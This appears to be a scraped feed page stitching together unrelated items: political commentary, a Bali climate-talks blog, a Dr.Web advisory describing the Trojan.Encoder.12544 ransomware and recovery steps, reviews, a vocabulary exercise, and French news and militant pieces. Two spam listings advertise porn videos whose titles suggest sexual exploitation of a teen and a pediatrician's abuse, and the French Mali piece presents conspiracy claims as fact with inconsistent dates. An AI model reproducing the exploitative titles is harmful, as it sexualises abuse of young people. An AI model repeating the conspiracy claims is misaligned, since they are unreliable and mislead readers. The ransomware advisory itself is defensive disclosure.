Finally, as the consummate closer, Romney made a classic mistake. An unforced error if you will. When given the opportunity at the end of the debate, to correct misconceptions of himself, Romney, who had been caught talking derogatorily about 47% of the American public, tried to overcompensate and said he was for 100% of the people. This gave Obama the opening he was looking for and he didn't miss the opportunity to go into some detail about who the 47% Romney had disparaged were. They were seniors, soldiers, students, even veterans. That Romney, the seasoned politician, businessman and closer extraordinaire, would leave himself open for such a clean punch at the end of a debate calls into question his judgment and his leadership abilities.
Of course, there was much more to this second debate and for those who didn't see it, it is worth a peek. The link is provided below in order to see the whole thing which is “must see” TV.


Link to C-SPAN for debate archives and more.


          An emerging deal?   

Half way through the UN climate talks here in Bali and we can now see the shape of the deal that will cause next week's most fevered discussion.

Swingeing cuts to greenhouse gases are very much on the table, with rich countries expected to act first and fastest. The proposed deal would aim to stop the relentless rise of emissions in just ten to fifteen years, and drive them down to ‘very low levels' by 2050.

But before we get to the detail, keep in mind three things. Nothing has yet been finalised here in Bali. This is simply ‘proposed text' - in UN jargon a ‘non-paper' - with no official status. It can be amended, replaced, or simply not agreed.

Read the current draft and you'll see its far from a complete document. It contains a number of options for further discussion and plenty of either/or text in the dreaded [square brackets] which reflect opposing views about what should be agreed.

Also, Bali is only the start of a process towards a post-2012 climate framework - one that picks up where the current phase of the Kyoto protocol leaves off. We're just setting up negotiations that will probably aim to conclude in 2009.

That means that governments haven't even begun to talk about the really difficult stuff. Exactly what cuts will be made. Which countries will make them. Who will pay and how much. All this needs to be decided over the next couple of years.

If all goes according to plan (does it ever?), countries will finally commit to a new deal at the next climate conference but one, in Copenhagen two years from now. And even then, it will be far from over, as the treaty will need to be ratified by national parliaments, a process than it's hoped will be done within three years (Kyoto took five).

Finally, the negotiation on the ‘future' is only one of many happening here in Bali. You're not reading a comprehensive state of play, just a review of one part of the talks, though the most important as most believe.

So what's in the proposed agreement?

First, the IPCCC's assessment of the seriousness of climate change is taken as a given. Thus the need for ambitious action. Emissions need to stop rising soon and be ‘well below half' of levels seen in 2000 by 2050.

That means industrialised countries should make emissions cuts of 25-40% by 2020. That's on a 1990 baseline, so includes any moves they've made to reduce carbon under Kyoto. But again, remember this is an aspirational target for the group as a whole. It says nothing about which country should do what.

Developed countries will have ‘quantified national emission objectives'. Crucially, this stops short of calling for targets that are legally binding under international law. Targets are not off the table, but the decision on whether the world needs them has been postponed.

Why? Because this is a fight that centres on the US, which is adamantly opposed to enforceable obligations. Why take it on now, when it's easier to see if there's a change of direction from the next adminstration?

What about developing countries? They'll be expected to contribute to slowing and then cutting emissions, but their right to economic growth is explicitly recognised. Binding targets for them are thus not on the table.

Instead, they are likely to be offered incentives if they grow along a lower-carbon trajectory and will get technologies to help them do this. They'll also be able to make money by protecting forests and other carbon sinks, in compensation for foregone economic exploitation.

So what's left to agree?

Quite a lot, actually. There's an annex that sets out an ‘indicative list' of areas that need to be discussed in the next two years. It's currently blank.

Then, crucially, there are still three options on the table for the status of the post-Bali process.

Option 1 is for an informal dialogue whose findings would be reported in Copenhagen, but "without prejudice" to the Copenhagen talks. If that sounds vague, it is, and deliberately so. There is next to no chance of a conclusion in 2009 under this option.

Options 2 and 3 are stronger. Both would set up a ‘working group' that would have much greater authority. The group would be told to agree a deal and then present is as a package to Copenhagen for approval.

The difference between the Options 2 and 3 is that the former would leave intact a similar working group that is already considering commitments for the Kyoto countries (all rich countries apart from the US).

That group has been willing to push for deep emissions cuts. So countries that want a strong deal tend to favour a two-track process.

So what reaction have we had to the proposal as a whole?

Well, I hear the EU delegation is pleased with progress. Also, the Saudis are reported to be furious, complaining that its ideas have not been listened to. As always, they remain key allies of the Americans at these talks.

But expect much more reaction next week, when the press and campaigners really get their teeth into the proposals. Today is a day of rest at the UN climate talks, with the conference hall closed. There is thus no central point for anyone to congregate.

But work hasn't stopped. Far from it. It's safe to say that most delegates will be hard at it, even that means (like me!) taking their laptops out to the pool. Phone lines back to capital cities are certain to be humming.

The NGOs are also working hard, meeting this afternoon to hash out strategy for next week.

I suspect that many of them will be secretly pleased by the non-paper's contents. They can hammer away at the bits they don't like and, if any of the text is weakened, take to the barricades with claims of treachery and betrayal.

Expect fireworks next week. Probably not on Monday though. The flashpoint might be the next day when Ministers start to arrive...


          Instructions for users affected by Trojan.Encoder.12544   

June 28, 2017

Trojan.Encoder.12544 spreads by exploiting the SMB v1 vulnerability - MS17-010 (CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148), which can be leveraged using the NSA "ETERNAL_BLUE" exploit. TCP ports 139 and 445 are used to disperse the Trojan. This “remote code execution” vulnerability enables attackers to remotely infect targeted computers.

  1. To regain access to Windows, you need to recover the MBR (you can use the standard procedure in the Recovery Console and launch bootrec.exe /FixMbr).

    You can also restore the boot record using Dr.Web LiveDisk — create a bootable CD or USB drive, boot up from that media, launch the Dr.Web scanner, check the compromised hard drive for viruses, and choose Cure for all the infected files.

  2. After that disconnect your PC from the network, boot up, and apply the patch MS17-010 https://technet.microsoft.com/en-us/library/security/ms17-010.aspx.

  3. Then install Dr.Web, establish a connection to the Internet, update the virus databases, and run a full system scan.

Trial for home users Trial for businesses

The Trojan replaces the MBR (Master Boot Record), and schedules and executes a system restart task. After that the OS won't boot up because the Master Boot Record has been compromised. Data starts being encrypted as soon as the system restart is scheduled. A separate AES key is generated for each drive. The key persists in the memory until the disk is completely encrypted. It is encrypted using a public RSA key and then deleted. If the MBR is replaced successfully, the MFT file is also encrypted once the system restarts. The file contains information about all the files on an NTFS drive. Once all these procedures are complete, the data can only be recovered using a private key. Therefore, without that key no files can be recovered.

As of now, decryption is not available. Our analysts are researching the problem and looking for a solution. We will notify you once a final determination has been made.


          Psychic Medium Bobby Brust a Royal Bust   
I waited for months for a reading from acclaimed psychic medium, Bobby Brust. On the date scheduled I showed at my brother in law's house (he had just lost his wife to brain cancer), waited hours for my turn, which when it finally arrived, he insisted on taking both my husband and me together. I respectfully objected for the sole reason that Mr. Brust had probably picked up a load of information on my husband, having spent the past five hours with four of his relatives. But with me, he had no information whatsoever. I was the true test. I wasn't born in the state of New Jersey. All my relatives, deceased and alive, were far away and probably couldn't be tracked through the resources available on the internet. So as I stepped onto the deck, excited to get my long awaited reading, he asked brusquely, "What's your name again?" I answered, to which he repeated in a mocking, annoyed tone. Not a good start, I thought. I sat across from him, wondering why he was reluctant to see me alone. The others went alone. He didn't want them accompanied by their spouses. He then launched into a preface, saying that some people can't be read, that their energy wasn't conducive to such exchanges. My soaring spirits fell hard. I knew then I waited for nothing, but I still hoped someone from the other side would come through, proving he wasn't a fake, that my grandmother and good friend, both of whom suffered excruciating deaths, were still with us and in a better place. How I wanted to believe! How I wanted a sign, any sign that would allow me to walk away happy and comforted. As I held my breath, waiting, he rubbed his palms together and closed his eyes. He then rattled off a series of numbers. "What does 8, 9, 10 mean to you?" he asked. I answered I was born on the 8th. Evidently, that didn't mean anything. "Thirteen, 14," he pursued. "Nothing," I responded, even though my brother was born on the 13th. "Seventeen, 18," he attempted again. I shook my head, knowing that one can ascribe a host of meanings to almost any number. "Twenty-two, 23, 24." I had to concentrate on avoiding the eye-roll as I told him my recently deceased sister-in-law was born on the 23rd, a piece of information that I'm certain he already knew, since he had spoken to her daughter, husband, and two sister-in-laws. He went on with two more numbers--27 and 28. Nothing, I said. I didn't want to give him too much information. After all, he was a psychic medium. He shouldn't need any hints or specifics about my life, and I wanted the assurance that the information given back was pure and couldn't be dismissed by me or any skeptic listener because I had revealed too many clues. Having no luck with the numbers, he started in with the alphabet. "R--Ronald, Richard, someone with an R." I nodded, saying my brother's name begins with an R, although his name is Rick. He smiled. "What do Rick and you have in common?" I mentioned the obvious--we're brother and sister. He went on. "Helen, Ellen, H." I shook my head. I didn't know anyone by those names, and that concluded my reading. He explained that too much of my husband's energy was coming through, and he would have to read him first before he could take me. I wanted to cry. I had so many questions, so much hope. Now, it's apparent that Mr. Brust's only ability is to employ tactics that glean as much information from his sitters as he can get, which he regurgitates into some semblance of meaning. He knows their need for reassurance and uses his craft to capitalize on their grief, an exploitation of vulnerability the worst of its kind. Sometimes, he mentioned the obvious, even though it wasn't correct. For instance, he assumed my husband's sixteen year old niece suffered scholastically after losing her mother, an event that's likely to occur, but wasn't the case--her grades actually went up. One would think that her deceased mother would have taken notice of this, if he were truly in contact with her. Bottom line: Don't get sucked in. Oh, by the way, he promised me a phone reading, since he claimed I was a conduit for energy and needed to be completely alone. It's been over three months and has yet to happen. What a bunch of bull! Don't waste your time or your money.
          A Fan of WSJ's Mackubin Thomas Owens   
The Wall Street Journal's Mackubin Thomas Owens has been inpressing me for quite some time now.  He is  a professor of national security affairs at the Naval War College, editor of Orbis, the quarterly journal of the Foreign Policy Research Institute, and author of "US Civil-Military Relations After 9/11: Renegotiating the Civil-Military Bargain" (Continuum, 2011).

He writes quite fluently with his military topics and is "top on" with his audience.  Here is a copy of what he worte on May 2, 2011:

Why We Still Need the Marines

Their unique combination of sea, land and air capabilities makes them an indispensable rapid response force.


In Washington these days, the Defense Department is looking to cut its budget and the Marine Corps especially is reviewing its future role. Defense Secretary Robert Gates has spoken of "anxiety" that the wars in Iraq and Afghanistan have turned the Corps into a "second land army," and he has cancelled major Marine weapons systems, such as the Expeditionary Fighting Vehicle. No institution is sacrosanct, so it's worth asking: Why should we maintain the Marine Corps in the future?

The utility of any institution must be balanced against the opportunity cost of maintaining it. In arguing against maintaining a Marine Corps in the future, one must prove either that what the Marines do isn't necessary, or that it is necessary but that another organization can do it more efficiently and effectively.

In 1954, the political scientist Samuel Huntington argued that each service was built around a "strategic concept"-"the fundamental element of [a] service . . . its role or purpose in implementing national policy." A service's strategic concept answers the "ultimate question: What function do you perform which obligates society to assume responsibility for your maintenance?"

The current Marine Corps strategic concept envisions an expeditionary force in readiness capable of responding rapidly to the full range of crises and contingencies, primarily but not exclusively from the sea, with integrated and balanced air, ground and logistics teams. To this end, the Marines provide a responsive and scalable "middleweight" force that is light enough to get to where it is needed quickly but heavy enough-and with sufficient logistics support-to prevail against an adversary upon arrival.

Due to the proliferation of high-tech defensive weapons, the most controversial element of the Marines' strategic concept are amphibious assaults against defended littorals. What most people envision when they think of an amphibious assault is a World War II scenario with landing craft churning toward a defended beach. But today's amphibious assaults seek to avoid the strength of the enemy's defenses, exploiting seams and gaps in those defenses in order to achieve surprise.

For example, in October 2001, Naval Task Force 58-commanded by then-Brig. Gen. James Mattis, who is now commander of U.S. Central Command-conducted an amphibious assault to seize the airfield at Kandahar, Afghanistan. Gen. Mattis's force of two infantry battalions, along with fixed-wing aircraft, helicopters and logistics support, thrust 450 nautical miles from ships off the coast of Pakistan to Kandahar in only 48 hours.

In addition to conducting amphibious operations and providing forces for two wars, over the past decade the Marines have also been engaged in the Caucasus, Africa, the Pacific and Latin America. They have provided training and support for friends and allies and have responded to numerous crises: noncombatant evacuation operations in Liberia (2005) and Lebanon (2006), as well as humanitarian assistance and disaster relief operations in Indonesia, the U.S. Gulf region (2005), Haiti (2008 and 2009), Pakistan (2010) and Japan (2011).

Marines routinely split amphibious ready groups into smaller packages to provide a variety of capabilities over a wider geographic area, reassembling to conduct larger operations. Marine assets are currently involved in aircraft-recovery operations in support of NATO forces in Libya.

So it would seem that what the Marines do is of value to the United States. But could another service do what the Marines do? The answer, of course, is yes. But the opportunity cost would be very high.

All of the U.S. military services are carrying out missions in support of their own strategic concepts. Asking another service to do what the Marines do risks crowding out what they already do. Each of the other services operates primarily in one "domain": the Army on land, the Navy on water, and the Air Force in air and space. The Marines operate in a "lane" that intersects all three domains. In that lane, the Marines possess what economists would call comparative advantage.

What about the charge that the Marines have become a second land army in Iraq and Afghanistan? As the assistant commandant of the Marine Corps, Gen. Joseph Dunford, recently remarked, the Marines have no reason to apologize for sustained operations ashore.

Such operations, he observed, are part of the basic "sticker price" of the Marines: the requirement to carry out missions as directed by the president, an obligation Marines have met in Korea and Vietnam as well as in Iraq and Afghanistan. In addition, an important part of Marine Corps tradition has been to prepare to fight the kind of small-unit wars we have confronted over the past decade.

The Marines are an expeditionary force with a maritime soul. Of course, the current security environment requires all services to become more expeditionary than was the case during the Cold War. But as former Marine Commandant Gen. Carl Mundy was fond of saying, "'Expeditionary' is not a mission. It's a mindset." The Marines have developed this expeditionary mindset over decades, and it is something that will serve the nation well in the future.

 


          Philip Pullman: His Dark Materials [4 stars]   
Philip Pullman: His Dark MaterialsSo… I burned through the three books (Northern Lights / The Golden Compass; The Subtle Knife; The Amber Spyglass) in the course of 72 hours, and two days later I’m still not sure what I want to write about them. As soon as I found out about the subject — some kind of alternate universe where you don’t wear your soul inside you but outside, embodied in a companion animal — I was hooked, and I wanted to see how the story was really developed and not limit myself to whatever could fit in a two-hour Hollywood movie. I was right to want to read the novels: the story is so dense I can’t imagine how you could reduce each book to a single movie script (I know that’s also true of Harry Potter or The Lord of the Rings, for instance, but the bottomline is I don’t care about whiny orphan sorcerers and whiny dim-witted hobbitses and OMG I just figured out a trend here) and, while the author’s style is not spectacular, it’s efficient and straight to the point — quite cinematographic, one could say, if one could imagine that word not being an insult. The big disappointment, though, was the lack of what I really hoped to find in the book that couldn’t possibly translate well into the movie: a coherent explanation, a real theory, of why those people have their souls outside of them and how that works. To be sure, the daemon thing is not a gadget — it’s really central to the first volume, and quite nicely exploited in the other two — but I could never really get over the fact that it makes no sense and, more importantly, that there’s no clear definition of what part of the characters’ personality lies in their heart/brain, and what lies in their soul/daemon. One of the books actually separates some characters from their daemons, and yet they don’t appear to act or think differently; if the soul is neither your emotions nor your conscience or, I don’t know, the center of your rational thought, then what’s your daemon really more than a talking plush toy with an uncanny gift for empathy (and an additional pair of eyes so you can watch behind your back)? But that’s not so bad; the story is strong enough to make you want to go on, despite the kind of nitpicking I can’t really ever let go of. What is bad, however, and more distracting from the story, is the author’s anticlericalism — if you thought that Christian associations protesting the adaptation on movie screens were out of line, well… consider this: I’m an agnostic, raised an atheist, and the author’s attack on the Christian religion is so violent that I would think twice before stocking those books in a school library. It’s one thing to depict an alternate-reality Vatican as a worldwide dictatorship (they’ve kinda been there and done that); but what Pullman establishes in the third book is heinous, and properly insulting to anyone who believes in one God, and that’s a lot of people. I don’t mean that it’s a bad story or it shouldn’t be told, just that it’s quite impolite, in a way, and that it shocked me out of solidarity with my believer friends (and I’m not sure I have any). Or maybe it’s less the story than the way it’s being told. Which brings me to the part where I’m glad I read the books but didn’t buy them (Thanks, rhino75): I don’t think I like this Pullman person very much. Nevermind writing a whole trilogy against religion (and making it all about destiny and religion, only pagan and new age-y); what really stopped me in my tracks was reading that dull people have dull daemons, and all manservants’ daemons are dogs and all maids’ are hens (if I remember correctly — the dogs are mentioned at least twice, but I’m not so sure about the hens). Erm… I’m sorry, that’s not something I’d much like to write, or read — and particularly not in a novel that’s purported to be for "children and young adults." Yeesh. And yet, like I said, I really am glad I read the books. Because the story is interesting, the universe is original, and the plot twists are… well, let’s say you really should read the trilogy before they start promoting the third movie, because you’ll want to save yourself the surprise of what’s going on there — by the way, I can’t wait to see how they handle the adaptation, if they removed any reference to religion from the first movie. (And the trilogy would make a very nice two- or three-season TV miniseries, if it were at all possible to produce a TV show with such a subject matter.) Recommended, then, not because it’s a masterpiece, but because it’s an original perspective, and a break from those whiny orphan sorcerers. Illustration: AeroMartin.
          Beautiful Nervous Teen Exploited By Fake Model Agent   
Watch Beautiful Nervous Teen Exploited By Fake Model Agent at XXXPorn.rs - best free online XXXPorn videos for you to enjoy.
          Exploited by school pediatrician   
Watch Exploited by school pediatrician at XXXPorn.rs - best free online XXXPorn videos for you to enjoy.
          9.os ANOS Vocabulário II   

Text II - Violence against children and women

There are many laws in Brazil about the protection of children against all forms of abuse, violence, and sexual exploitation. But the basic problem here is the enormous space separating children's rights in theory and practice. There are now seven million abandoned children living on the streets of Brazilian cities. Crimes against these children are characterized by extreme brutality and include torture. Violence against women is, historically, a frequent episode in Brazil. According to the United Nations, Brazilian women are "frequently exposed" to all forms of sexual victimization. A 2004 document by the United Nations informs that the country has one of the highest levels of incidents in the world under the categories of rape (estupro), attempted (tentativa) rape, and physical attack. A 2001 study found that 2.1 million Brazilian women become victims of physical abuse every year.

01) Give the synonyms of these words. Look for them in the text II.

a) security - ___________________________
b) supposition - ________________________
c) cruelty - ____________________________
d) incorporate - ________________________
e) a lot of - ___________________________
f) defense  - __________________________

g) aggression - ________________________
h) excessive - _________________________

02) Look for the words of these definitions in the text II.

a) _______________________ - A public way in a city or town.
b) _______________________ - Something that happens often. 
c) _______________________ - With no protection.
d) _______________________ - To give or offer information.
e) _______________________ - A period or interval of time 
f) _______________________ - A question to be considered, resolved or answered.
g) _______________________ - At the present time, immediately.
h) _______________________ - The cardinal number equal to 106.

          Wrong Move: Obama's Liberal Agenda   

Following Obama during the New Hampshire primary, I saw a candidate who -- though I disagreed with him on many issues -- defended idealism and rhetoric against the supremely cynical Clinton machine, who brought a religious sensibility to matters of social justice, who took care to understand and accommodate the arguments of others, who provided a temperamental contrast to culture war politics.

After just weeks of governing, that image seems like a brittle, yellowed photograph, buried at the back of a drawer.

Obama's proposed budget shows all the vision, restraint and grace of a grasping committee chairman, using the cover of a still-unresolved banking crisis to push through a broad liberal wish list before anyone notices its costs and complications. The pledge of "responsibility" has become the massive expansion of debt, the constant allocation of blame to others and the childish cultivation of controversy with conservative media figures to favorably polarize the electorate. The pledge of "honesty" and "sacrifice" has become the deceptive guarantee of apparently limitless public benefits at the expense of a very few. The pledge of "bipartisan" cooperation has become an attempt to shove Republicans until their backs reach some wall of outrage and humiliation.

None of this is new or exceptional -- which is the point. It is exactly the way things have always been done.

Obama's stem cell decision was worse, because it is a thing that has never been done before. "Obama," explains Yuval Levin of the Ethics and Public Policy Center, "is willfully ignoring the moral complexity of the subject. He says he understands the views of his opponents, but he never addresses or answers them. He seems to have adopted the premise that the stem cell debate presents a choice between science and ignorance, when in fact the debate requires the kind of weighing of competing goods which we elect presidents to contend with."

Obama's approach is ethically simplistic -- the kind of argument that gets nods at a fashionable cocktail party instead of engaging and respecting serious disagreement.

One tragedy of these polarizing moves is that they obscure elements of Obama's agenda that deserve praise and support. It makes perfect moral and economic sense to expand child nutrition programs, ensuring that low-income children get breakfast and lunch during a time of economic stress. Also, to expand rental assistance to low-income families. To fully fund the Second Chance Act, which helps ex-prisoners reintegrate into society. To increase funding for domestic AIDS treatment, especially in African-American and Latino communities. To make the child tax credit at least partially refundable. To limit farm subsidies that distort global food markets and hurt the poor. To provide additional support to strained food banks. To make the saver's credit refundable, encouraging low-income Americans to build assets. To maintain life-saving commitments promoting global health and development.

These should be common-ground issues in our politics -- safe havens on the ideological battlefield and sources of genuine consensus. But these issues have been roundly ignored during the ideological death match Obama has encouraged -- a partisan struggle that has made congressional Republicans less likely to support his best initiatives. Obama's overall budget is praised by economist Robert Reich as driving "a nail in the coffin of Reaganomics." Republicans attack the budget for the same reason. And both are correct in their analysis. It is not a sign of post-partisanship when liberals swoon and conservatives seethe for exactly the same reason. It is a sign that our differences have been exploited and deepened.

Some relish this kind of politics. But the false dawn of post-partisanship is no reason for celebration. Ideological war creates an atmosphere in which the angry predominate -- and it can cause anger to rise unbidden within all of us. While in government, I saw the persistent, moaning critics outside the window. Now I have dug my tunnel and joined them. It is not where I want to be -- or where American politics might have been.


          Obama's Messenger for Moral Incoherence   

Taxpayers will now likely fund not only the use of "spare" embryos from in vitro fertilization, but also human lives produced and ended for the sole purpose of scientific exploitation. Biotechnicians have been freed from the vulgar moralism of the masses, so they can operate according to the vulgar utilitarianism of their own social clique -- the belief that some human lives can be planted, plucked and processed for the benefit of others.

It is the incurable itch of pro-choice activists to compel everyone's complicity in their agenda. Somehow getting "politics out of science" translates into taxpayer funding for embryo experimentation. "Choice" becomes a demand on doctors and nurses to violate their deepest beliefs or face discrimination.

It is probably not a coincidence that Obama has chosen a Roman Catholic -- Kansas Gov. Kathleen Sebelius -- to implement many of these policies as secretary of the Department of Health and Human Services. Obama has every right to a pro-choice Cabinet. But this appointment seems designed to provide religious cover. It also smacks of religious humiliation -- like asking a rabbi to serve the pork roast or an atheist to bless the meal.

Sebelius, though strongly pro-choice, was capable of occasional compromise. But she consistently fought against the serious enforcement of Kansas' late-term abortion restrictions. Kansas became a magnet for late-term abortions.

Still, Sebelius insists that "my Catholic faith teaches me that all life is sacred." This puts her in the same category as House Speaker Nancy Pelosi and Vice President Joe Biden -- Catholics who assert the sanctity of life while defending legal abortion. It has also earned Sebelius a firm rebuke from her archbishop.

The explanations of pro-choice Catholics are varied. Some say they will not impose their private religious views on others. But moral beliefs about human dignity are not religious dogmas such as transubstantiation or the Trinity. They are assertions about the nature of political justice. Removing the transcendent basis for human rights would also remove the central argument of the Declaration of Independence and the primary motivation for American social reform from abolition to the civil rights movement.

Others claim they are merely employing an alternative method to secure the rights of the unborn -- through social welfare programs rather than legal restrictions. In Sebelius' case, the overall abortion rate in Kansas did decline slightly more than the national reduction, though it is difficult to trace this drop to her policies. And the question arises: Couldn't a Catholic politician support women in crisis and effective protections for viable children?

Pro-choice Catholics respond that the legal remedies on abortion have been exhausted, so we might as well focus on the common-ground issue of abortion reduction -- a cause that does deserve support. But legal remedies have not been exhausted; they have been pre-empted by the courts. The exercise of democracy on abortion would probably not lead to restrictions on early abortions. But it would probably lead to broader protections for viable children. And it is difficult to imagine how anyone committed to the principle that "all life is sacred" could oppose such a democratic outcome.

Supporters of the Sebelius position also contend that there are myriad pro-life issues, including the environment and health care. Why favor some above others? It is true that nearly every political issue concerns the preservation of human life. But not every issue concerns the definition of the human community -- who we count as one among us, and who we cast beyond our protection.

If developing life is merely protoplasmic rubbish, it has the legal claims of a cyst or a toenail. But if a politician believes life is sacred, the destruction of more than a million lives a year cannot be merely one issue among many.

Sebelius and other pro-choice Catholic leaders are disagreeing with their church on a fundamental issue of justice -- which is their right. It is also the right of their church to point out their incoherence.


          MASCARA : Arrestation de 5 dealers et saisie de psychotropes   
Poursuivant leurs efforts en matière de lutte contre le trafic illicite de stupéfiants à travers le périmètre urbain, les éléments de la brigade de lutte anti stupéfiants, relevant de la Sûreté de wilaya de Mascara, ont réussi à arrêter 05 dealers de psychotropes âgés entre 29 et 35 ans avec la saisie de 158 comprimés hallucinogènes, et ce suite à l’exploitation d’un renseignement qui leur est parvenu indiquant qu’un groupe d’individus à bord d’un véhicule revendaient des stupéfiants au niveau de la sortie ouest de la ville de Mascara. Les éléments de la brigade ont mis en place un plan parfait en plaçant le véhicule en question sous surveillance avant d’arrêter les mis en cause. Il y avait deux individus à bord, lesquels ont été soumis à la fouille corporelle, ce qui a permis de retrouver en possession de l’un d’eux 15 plaquettes de psychotropes contenant au total 150 comprimés. Les deux suspects ont été arrêtés et conduits au siège de la brigade où une enquête a été ouverte sur les faits qui leur sont reprochés. L’enquête a abouti à l’arrestation de trois autres individus et à la saisie de 08 autres comprimés de psychotropes. Une fois les procédures d’enquête accomplies, une procédure judiciaire a été instruite à l’encontre des suspects qui  furent  présentés devant la justice qui a placé deux d’entre eux en détention, le troisième sous contrôle judiciaire tandis que les deux autres ont bénéficié de la liberté provisoire.       


          TRAITE D’ETRES HUMAINS : L’Algérie à la 2ème catégorie du classement des Américains   
L’Algérie a remonté dans le classement du rapport annuel sur le trafic de personnes, établi par le département d'Etat américain, figurant désormais dans la catégorie 2 au lieu de la catégorie 3 qu’elle occupait l’année dernière.
"Le gouvernement a enregistré des réalisations clés durant la période considérée. En conséquence (le classement de l'Algérie) s'est amélioré en passant à la liste de surveillance Tier 2 ", souligne le rapport 2017 du département d’Etat sur le trafic de personnes, publié mardi à Washington. Les réalisations comprennent, entre autres, la poursuite de 16 présumés trafiquants et l’identification de 65 victimes de travail forcé, relève ce rapport présenté par le secrétaire d’Etat, Rex Tillerson. Et d'ajouter que l'Algérie "a consenti des efforts considérables" pour se conformer aux normes minimales en matière d'élimination de la traite d'êtres humains. Le classement du département d’Etat qui comprend quatre catégories à savoir catégorie 1, catégorie 2, liste de surveillance de la catégorie 2 et catégorie 3 est "fondé davantage sur l’ampleur des efforts menés par les pouvoirs publics pour lutter contre la traite des personnes que sur l’étendue du problème dans le pays". D’ailleurs, la Catégorie 1, classement le plus élevé, ne signifie pas que la traite des personnes n’existe pas dans les pays en question ni que ces pays appliquent des mesures suffisantes pour lutter contre ce phénomène. Elle indique plutôt que les autorités ont constaté l’existence de la traite des personnes, qu’elles ont déployé des efforts pour régler le problème et qu’elles se conforment aux normes minimales de la loi américaine sur la protection des victimes de la traite (TVPA), adopté en 2000. Le rapport constate, à ce titre, que les crimes d’exploitation sexuelle des enfants et de travail forcé sont "des cas isolés" en Algérie en dépit du fait que le pays demeure "un pays de transit et de destination" pour l’immigration clandestine. Il relève que le gouvernement algérien a fourni aux victimes identifiées un hébergement temporaire dans un centre de transit, une assistance médicale ainsi que d’autres services de base malgré leur statut d’immigrés illégaux. Aussi, le gouvernement a démontré sa volonté politique de faire face à cette problématique en promulguant en septembre dernier un décret présidentiel qui a institutionnalisé le Comité Interministériel chargé de coordonner les activités liées à la prévention et à la lutte contre la traite des personnes en le dotant d’un budget et d’un mandat à cet effet, souligne le même document.


          8 mars 1917 Ce sont les femmes de Petrograd qui déclenchèrent la révolution russe   
par Yanick Toutain
REVACTU
8/3/2017




Le quota de 1 délégué pour 500 qui permit l'organisation du pouvoir du peuple en mars 1917 à Petrograd est précurseur de ce que les femmes d'Afrique feront bientôt.
Ce seront 20 millions de femmes qui seront désignées déléguées de  base de CDR Sankara
Ce seront 800 000 femmes qui seront choisies
comme déléguées conseillères pour gérer les comités de villes
Ce seront 32 000 femmes qui seront choisies
 comme déléguées députées pour gérer les comités de région
Ce seront 1280 femmes qui seront choisies
comme déléguées nationales pour gérer les comités nationaux
Ce seront 51 femmes qui seront choisies
comme déléguées internationales pour le CIRAF,
Comité International de la Révolution Africaine


 il est donc établi que la Révolution de Février fut déclenchée par les éléments de la base qui surmontèrent l'opposition de leurs propres organisations révolutionnaires et que l'initiative fut spontanément prise par un contingent du prolétariat exploité et opprimé plus que tous les autres – les travailleuses du textile, au nombre desquelles, doit-on penser, l'on devait compter pas mal de femmes de soldats. La dernière impulsion vint des interminables séances d'attente aux portes des boulangeries. Le nombre des grévistes, femmes et hommes, fut, ce jour-là, d'environ 90 000. Les dispositions combatives se traduisirent en manifestations, meetings, collisions avec la police. (Léon Trotsky)

La révolution russe fut initiée par les femmes le 8 mars.
Elles étaient en lutte contre la guerre déclenchée par les impérialistes.
Une guerre dont la principale fonction avait été de casser la montée révolutionnaire en Europe pendant le premier semestre 1914.
Une montée plus puissante encore que celle de 1905.
La révolution russe fut initiée par les femmes. Une vérité camouflée par tous les gredins et gredines malades de pathologie consumériste en ce 8 mars 2017.
Il y a cent ans des femmes commencèrent la révolution. Les historiens camouflent cela.
Le camouflage du rôle initiateur des femmes dans la révolution malienne de mars 2012 est encore plus scandaleux.
C'est logique quand on sait qu'elles partirent en manifestation contre un président du Mali ATT complice des terroristes qui fut surpris au téléphone pendant qu'il prenait des nouvelles de l'attaque d'Aguel Hoc auprès des leaders MNLA et jihadistes Ansardine le 20 mai 2012.



Les femmes de Kati ont commencé la révolution malienne le 31 janvier 2012

Par Julie Amadis
#IpEaVaEaFaF
Le 06/03/16



On a beaucoup entendu parler des courageuses femmes Kurdes qui combattent les islamofascistes de Daech en Syrie mais très très très peu (et pas du tout dans les médias occidentaux) des femmes maliennes qui combattent contre les terroristes missionnés par Sarkozy, Fillon et le général Puga en 2011.


Des narco-trafiquants MNLA, ribistes islamofascistes téléguidés par l'Etat français et le Qatar qui pris en charge la logistique des terroristes sous camouflage Croissant Rouge : MNLA, Ansar Dine, MUJAO, AQMI.

Ce sont les femmes de Kati qui débutent la révolution malienne de 2012.
Le 31 janvier 2012, les femmes de militaires manifestent pacifiquement pour dénoncer le fait que l'Etat malien Franceàfric ne fasse pas le nécessaire contre les islamofascistes qui envahissent le Nord-Mali. 

Pour comprendre, il faut remonter quinze jours avant. C'est l'objet d'un premier article.

C'est Sarkozy, Fillon, Juppé, Baroin et le général Puga qui ont envoyé les jihadistes attaquer le Mali avec la complicité du président ATT

Ici nous nous consacrons à l'irruption des femmes de soldats de Kati sur la scène politique malienne.


RÉVOLTE DES FEMMES = DÉBUT DE LA RÉVOLUTION MALIENNE


C'est parce que le président ATT laisse les terroristes envahir le Mali, égorger les Maliens et appliquer la charia que les femmes sont en colère. 

Le massacre d'Aguelhoc et la révélation est la goutte d'eau qui fait déborder un vase déjà bien rempli.

Leur colère explose le 31 juillet 2012. (la suite ici)




LA MANIFESTATION DU 31 JANVIER 2012

Le 31 janvier 2012, les femmes de militaires de la garnison de Kati manifestent pacifiquement pour dénoncer le fait que l'Etat malien Franceàfric ne fasse pas le nécessaire contre les islamofascistes qui envahissent le Nord-Mali. Elles vivent avec la peur de perdre leur mari chaque jour et ne supportent pas de rester les bras croisés à les attendre. 
Elles refusent donc que le combat de leur mari contre les islamofascistes ne soit un simulacre au moment où - on en aura la preuve - le Président aide les terroristes.
Elles exigent que leurs hommes soient correctement armés pour vraiment libérer le pays.
Elles marchent dans les rues de Kati, ville située au Mali à 15 km de la capitale, accompagnées de leurs enfants. Durant huit heures, il sera impossible d'entrer dans la ville. Leur mouvement a entraîné d'autres habitants de Kati qui les ont rejoint.
 Dès 9h du matin, ces femmes se sont rassemblées à la place des Martyrs. Elles ont marché avec leurs pancartes où l'on pouvait lire "A bas ATT assassins de nos soldats".

L'une d'entre elles exprime le sentiment général des manifestantes. 
"Les larmes aux yeux, la gorge nouée, une frêle jeune fille, à peine sortie de l’enfance, criait comme pour se faire entendre de tout le pays :« Nous ne supportons plus d’assister les bras croisés à l’assassinat de nos pères et de nos frères, mal armés, au nord du Mali »."(maliweb)
Le nombre de manifestants étaient de 500. 



